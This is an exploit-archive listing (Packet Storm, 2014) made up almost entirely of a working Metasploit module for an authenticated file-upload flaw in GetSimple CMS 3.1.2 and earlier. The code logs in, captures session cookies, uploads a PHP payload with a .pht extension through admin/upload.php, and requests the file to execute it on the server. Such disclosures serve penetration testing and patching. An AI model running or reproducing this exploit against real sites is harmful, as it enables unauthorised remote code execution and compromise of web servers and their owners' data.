GetSimpleCMS PHP File Upload

2014-09-19T00:00:00
ID PACKETSTORM:128326
Type packetstorm
Reporter Ahmed Elhady Mohamed
Modified 2014-09-19T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'GetSimpleCMS PHP File Upload Vulnerability',  
'Description' => %q{  
This module exploits a file upload vulnerability in GetSimple CMS. By abusing the  
upload.php file, a malicious authenticated user can upload an arbitrary file,  
including PHP code, which results in arbitrary code execution.  
},  
'Author' =>  
[  
'Ahmed Elhady Mohamed'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['EDB', '25405'],  
['OSVDB', '93034']  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'Platform' => 'php',  
'Arch' => ARCH_PHP,  
'Targets' =>  
[  
['Generic (PHP Payload)', {}]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Jan 04 2014'  
))  
  
register_options([  
OptString.new('TARGETURI', [true, 'The full URI path to GetSimplecms', '/GetSimpleCMS']),  
OptString.new('USERNAME', [true, 'The username that will be used for authentication process']),  
OptString.new('PASSWORD', [true, 'The right password for the provided username'])  
], self.class)  
end  
  
def send_request_auth  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path.to_s, "admin", "index.php"),  
'vars_post' => {  
'userid' => "#{datastore['USERNAME']}",  
'pwd' => "#{datastore['PASSWORD']}",  
'submitted' => 'Login'  
}  
})  
  
res  
end  
  
def send_request_upload(payload_name, cookie_http_header)  
data = Rex::MIME::Message.new  
data.add_part("<?php #{payload.encoded} ?>", 'application/x-httpd-php', nil, "form-data; name=\"file[]\"; filename=\"#{payload_name}\"")  
data.add_part("Upload", nil, nil, "form-data; name=\"submit\"")  
  
data_post = data.to_s  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path.to_s, "admin", "upload.php"),  
'vars_get' => { 'path' =>'' },  
'cookie' => cookie_http_header,  
'ctype' => "multipart/form-data; boundary=#{data.bound}",  
'data' => data_post  
})  
  
res  
end  
  
def check  
res = send_request_cgi({'uri' => normalize_uri(target_uri.path.to_s, 'admin', 'index.php')})  
  
if res && res.code == 200 && res.body && res.body.to_s =~ /GetSimple CMS.*Version\s*([0-9\.]+)/  
version = $1  
else  
return Exploit::CheckCode::Unknown  
end  
  
print_status("#{peer} - Version #{version} found")  
  
if Gem::Version.new(version) <= Gem::Version.new('3.1.2')  
return Exploit::CheckCode::Appears  
end  
  
Exploit::CheckCode::Safe  
end  
  
def exploit  
print_status("#{peer} - Authenticating...")  
res = send_request_auth  
  
if res && res.code == 302  
print_status("#{peer} - The authentication process is done successfully!")  
else  
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")  
end  
  
print_status("#{peer} - Extracting Cookies Information...")  
cookie = res.get_cookies  
if cookie.blank?  
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")  
end  
  
print_status("#{peer} - Uploading payload...")  
payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht'  
res = send_request_upload(payload_name, cookie)  
  
if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</  
upload_path = $1  
print_good("#{peer} - File uploaded to #{upload_path}")  
register_file_for_cleanup(payload_name)  
else  
fail_with(Failure::Unknown, "#{peer} - Upload failed")  
end  
  
print_status("#{peer} - Executing payload...")  
send_request_raw({  
'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name),  
'method' => 'GET'  
}, 5)  
end  
  
end  
`